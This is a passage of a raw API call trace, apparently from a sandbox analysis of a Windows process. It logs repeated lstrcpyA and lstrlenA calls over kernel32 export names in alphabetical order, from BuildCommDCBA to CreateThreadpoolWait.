lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0181.526] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0181.526] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0181.526] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0181.526] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0181.526] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0181.526] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0181.526] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0181.526] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0181.526] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0181.526] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0181.526] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0181.526] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0181.526] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0181.526] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0181.526] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0181.526] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0181.526] lstrlenA (lpString="CANCELIO") returned 8 [0181.526] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0181.526] lstrlenA (lpString="CANCELIOEX") returned 10 [0181.526] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0181.526] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0181.526] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0181.526] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0181.526] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0181.526] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0181.526] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0181.526] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0181.526] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0181.527] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0181.527] lstrlenA (lpString="CHECKELEVATION") returned 14 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0181.527] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0181.527] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0181.527] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0181.527] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0181.527] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0181.527] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0181.527] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0181.527] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0181.527] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0181.527] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0181.527] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0181.527] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0181.527] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0181.527] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0181.527] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0181.527] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0181.527] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0181.528] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0181.528] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0181.528] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0181.528] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0181.528] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0181.528] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0181.528] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0181.528] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0181.528] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0181.528] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0181.528] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0181.528] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0181.528] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0181.528] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0181.528] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0181.528] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0181.528] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0181.528] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0181.528] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0181.528] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0181.528] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0181.528] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0181.528] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0181.528] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0181.528] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0181.528] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0181.528] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0181.528] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0181.528] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0181.528] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0181.528] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0181.528] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0181.528] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0181.528] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0181.528] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0181.529] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0181.529] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0181.529] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0181.529] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0181.529] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0181.529] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0181.529] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0181.529] lstrlenA (lpString="COPYCONTEXT") returned 11 [0181.529] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0181.529] lstrlenA (lpString="COPYFILEA") returned 9 [0181.529] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0181.529] lstrlenA (lpString="COPYFILEEXA") returned 11 [0181.529] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0181.529] lstrlenA (lpString="COPYFILEEXW") returned 11 [0181.529] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0181.529] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0181.529] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0181.529] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0181.529] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0181.529] lstrlenA (lpString="COPYFILEW") returned 9 [0181.529] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0181.529] lstrlenA (lpString="COPYLZFILE") returned 10 [0181.529] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0181.529] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0181.529] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0181.529] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0181.529] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0181.529] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0181.529] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0181.529] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0181.529] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0181.529] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0181.529] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0181.529] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0181.530] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0181.530] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0181.530] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0181.530] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0181.530] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0181.530] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0181.530] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0181.530] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0181.530] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0181.530] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0181.530] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0181.530] lstrlenA (lpString="CREATEEVENTA") returned 12 [0181.530] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0181.530] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0181.530] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0181.530] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0181.530] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0181.531] lstrlenA (lpString="CREATEEVENTW") returned 12 [0181.531] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0181.531] lstrlenA (lpString="CREATEFIBER") returned 11 [0181.531] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0181.531] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0181.531] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0181.531] lstrlenA (lpString="CREATEFILEA") returned 11 [0181.531] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0181.531] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0181.531] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0181.531] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0181.531] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0181.531] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0181.531] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0181.532] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0181.532] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0181.532] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0181.532] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0181.532] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0181.532] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0181.532] lstrlenA (lpString="CREATEFILEW") returned 11 [0181.532] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0181.532] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0181.532] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0181.532] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0181.532] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0181.532] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0181.532] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0181.532] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0181.532] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0181.532] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0181.532] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0181.532] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0181.532] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0181.532] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0181.532] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0181.532] lstrlenA (lpString="CREATEJOBSET") returned 12 [0181.532] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0181.532] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0181.532] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0181.532] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0181.532] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0181.532] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0181.532] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0181.532] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0181.532] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0181.532] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0181.532] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0181.533] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0181.533] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0181.533] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0181.533] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0181.533] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0181.533] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0181.533] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0181.533] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0181.533] lstrlenA (lpString="CREATEPIPE") returned 10 [0181.533] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0181.533] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0181.533] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0181.533] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0181.533] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0181.533] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0181.533] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0181.533] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0181.533] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0181.533] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0181.533] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0181.533] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0181.533] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0181.533] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0181.533] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0181.533] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0181.533] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0181.533] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0181.533] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0181.533] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0181.533] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0181.533] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0181.533] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0181.533] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0181.533] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0181.533] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0181.534] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0181.534] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0181.534] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0181.534] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0181.534] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0181.534] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0181.534] lstrlenA (lpString="CREATETHREAD") returned 12 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0181.534] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0181.534] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0181.534] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0181.534] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0181.534] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") 